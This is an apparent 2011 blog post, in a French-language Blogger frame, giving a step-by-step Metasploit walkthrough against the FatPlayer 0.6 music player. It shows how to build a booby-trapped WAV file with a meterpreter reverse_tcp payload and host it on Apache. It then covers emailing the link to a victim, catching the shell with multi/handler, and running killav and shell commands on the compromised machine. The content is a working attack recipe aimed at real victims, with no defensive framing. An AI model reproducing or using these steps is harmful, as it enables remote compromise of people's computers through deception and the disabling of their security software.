vendredi 15 juillet 2011

metasploit vs fatplayer


view the video online:http://blip.tv/jac0bn3t/metasploit-fatplayer-buffer-overview-5376533
download the video: http://blip.tv/file/get/Jac0bn3t-metasploitFatplayerBufferOverview350.mp4

what i have use :

metasploite
OS:backtrack5 and Win xp SP 3
fatplayer
Camtasia recorder
mozilla firefox

hacking steps :

*i have look for a vuln music player and i have found that fatplayer the 06b version is vuln whit the buffer overview so i have create the backdoor on a wav fileformat nice

*start msfconsole

*exploit is :windows/fileformat/fatplayer_wav

*the commands of creating the backdoor are:
   *set FILENAME yourfilename.wav (i have name it playme.wav)
   *set OUTPUTPATH /root directory
   *payload windows/meterpreter/reverse_tcp
   *lhost= you ip using ifconfig
   *lport = any port you want to listen on on it (for me is 8080)
   *exploit to create the backdoor on wav file format

*download the vuln fatplayer 0.6

* rename your fatplayer_win32.exe and backdoor.wav with any name you choose (for me is "fatplayer_win32.exe======>fatplayer.exe" and "backdoor.wav=======>playme.wav")

*start apache2 server (all commands can be found at the last of the post)

*place you fatplayer_win.exe and backdoor.wav to "/var/www" to be easy to share whit your victim

*soscial engine you victim by sending an email whit your email manager (for me is ssmtp) whit the ip adresse of your apache server (you ip adresse can be found using ifconfig) like this yourip/backoor.wav and yourip/fatplayer.exe

*listing on the port that we have create the backdoor with (for me its 8080)
   *use exploit/multi/handler/
   *set lport= the port that you have use to create the payload (for me is 8080)
   *set lhost= your ip adresse (you can found it using ifconfig)
   *exploit (waiting for the victim to play the music )

*after the victim play the music you gonna get a meterpreter session open

*make some exiting scripts on meterpreter
   *run checkvm : to now if the system is a virtuel machin
   *run killav :to killing antivirus services
   *shell -i : the get the system shell

THE COMMANDS ARE :
cp : to copy and past cp /root/mydata.txt /etc/init.d/mydata.txt
mv : to rename file: mv mydata.txt data.txt
servic apache2 start : to start apache


Music:by savage garder
  *santa monica
   *animal song
published by at

Aucun commentaire:

Enregistrer un commentaire

Inscription à : Publier les commentaires (Atom)